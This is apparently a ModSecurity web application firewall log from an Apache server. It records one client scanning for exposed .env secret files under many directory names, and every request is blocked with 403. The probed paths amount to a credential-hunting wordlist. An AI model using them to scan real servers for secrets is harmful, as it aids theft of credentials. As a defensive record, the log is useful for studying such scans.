[Wed Dec 10 07:47:43.631366 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aTkXj5V8tnhi0nExSI590wAAAAo"]
[Wed Dec 10 07:47:43.652939 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aTkXj5V8tnhi0nExSI591AAAAAo"]
[Wed Dec 10 07:47:43.653163 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aTkXj5V8tnhi0nExSI591AAAAAo"]
[Wed Dec 10 07:47:43.653347 2025] [:error] [pid 642264] [client 45.148.10.247:55054] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aTkXj5V8tnhi0nExSI591AAAAAo"]
[Wed Dec 10 07:47:43.733807 2025] [:error] [pid 642265] [client 45.148.10.247:55060] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aTkXj7P2BPelBlHY7gEecwAAAAs"]
[Wed Dec 10 07:47:43.734107 2025] [:error] [pid 642265] [client 45.148.10.247:55060] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aTkXj7P2BPelBlHY7gEecwAAAAs"]
[Wed Dec 10 07:47:43.734309 2025] [:error] [pid 642265] [client 45.148.10.247:55060] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aTkXj7P2BPelBlHY7gEecwAAAAs"]
[Wed Dec 10 07:47:48.548295 2025] [:error] [pid 636951] [client 45.148.10.247:55072] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aTkXlNk209adLJ1hacVSXwAAAAU"]
[Wed Dec 10 07:47:48.548571 2025] [:error] [pid 636951] [client 45.148.10.247:55072] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aTkXlNk209adLJ1hacVSXwAAAAU"]
[Wed Dec 10 07:47:48.548884 2025] [:error] [pid 636951] [client 45.148.10.247:55072] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aTkXlNk209adLJ1hacVSXwAAAAU"]
[Wed Dec 10 07:47:51.526954 2025] [:error] [pid 636951] [client 45.148.10.247:55072] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aTkXl9k209adLJ1hacVSYAAAAAU"]
[Wed Dec 10 07:47:51.527189 2025] [:error] [pid 636951] [client 45.148.10.247:55072] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aTkXl9k209adLJ1hacVSYAAAAAU"]
[Wed Dec 10 07:47:51.527378 2025] [:error] [pid 636951] [client 45.148.10.247:55072] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aTkXl9k209adLJ1hacVSYAAAAAU"]
[Wed Dec 10 07:47:51.614629 2025] [:error] [pid 636938] [client 45.148.10.247:35934] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aTkXl0cYaZQwDd7_nrtnVwAAAAM"]
[Wed Dec 10 07:47:51.614860 2025] [:error] [pid 636938] [client 45.148.10.247:35934] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aTkXl0cYaZQwDd7_nrtnVwAAAAM"]
[Wed Dec 10 07:47:51.615023 2025] [:error] [pid 636938] [client 45.148.10.247:35934] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aTkXl0cYaZQwDd7_nrtnVwAAAAM"]
[Wed Dec 10 07:47:51.688994 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aTkXl2Hv40YZWlW-27908QAAAAA"]
[Wed Dec 10 07:47:51.689343 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aTkXl2Hv40YZWlW-27908QAAAAA"]
[Wed Dec 10 07:47:51.689588 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aTkXl2Hv40YZWlW-27908QAAAAA"]
[Wed Dec 10 07:47:51.711091 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTkXl2Hv40YZWlW-27908gAAAAA"]
[Wed Dec 10 07:47:51.711321 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTkXl2Hv40YZWlW-27908gAAAAA"]
[Wed Dec 10 07:47:51.711506 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aTkXl2Hv40YZWlW-27908gAAAAA"]
[Wed Dec 10 07:47:51.733551 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aTkXl2Hv40YZWlW-27908wAAAAA"]
[Wed Dec 10 07:47:51.733789 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aTkXl2Hv40YZWlW-27908wAAAAA"]
[Wed Dec 10 07:47:51.733981 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aTkXl2Hv40YZWlW-27908wAAAAA"]
[Wed Dec 10 07:47:51.775205 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aTkXl2Hv40YZWlW-27909AAAAAA"]
[Wed Dec 10 07:47:51.775462 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aTkXl2Hv40YZWlW-27909AAAAAA"]
[Wed Dec 10 07:47:51.775675 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aTkXl2Hv40YZWlW-27909AAAAAA"]
[Wed Dec 10 07:47:51.806130 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTkXl2Hv40YZWlW-27909QAAAAA"]
[Wed Dec 10 07:47:51.806427 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTkXl2Hv40YZWlW-27909QAAAAA"]
[Wed Dec 10 07:47:51.806638 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aTkXl2Hv40YZWlW-27909QAAAAA"]
[Wed Dec 10 07:47:51.879769 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTkXl2Hv40YZWlW-27909gAAAAA"]
[Wed Dec 10 07:47:51.880011 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTkXl2Hv40YZWlW-27909gAAAAA"]
[Wed Dec 10 07:47:51.880200 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aTkXl2Hv40YZWlW-27909gAAAAA"]
[Wed Dec 10 07:47:51.915895 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aTkXl2Hv40YZWlW-27909wAAAAA"]
[Wed Dec 10 07:47:51.916017 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aTkXl2Hv40YZWlW-27909wAAAAA"]
[Wed Dec 10 07:47:51.916235 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aTkXl2Hv40YZWlW-27909wAAAAA"]
[Wed Dec 10 07:47:51.916421 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aTkXl2Hv40YZWlW-27909wAAAAA"]
[Wed Dec 10 07:47:52.100114 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTkXmGHv40YZWlW-2790-wAAAAA"]
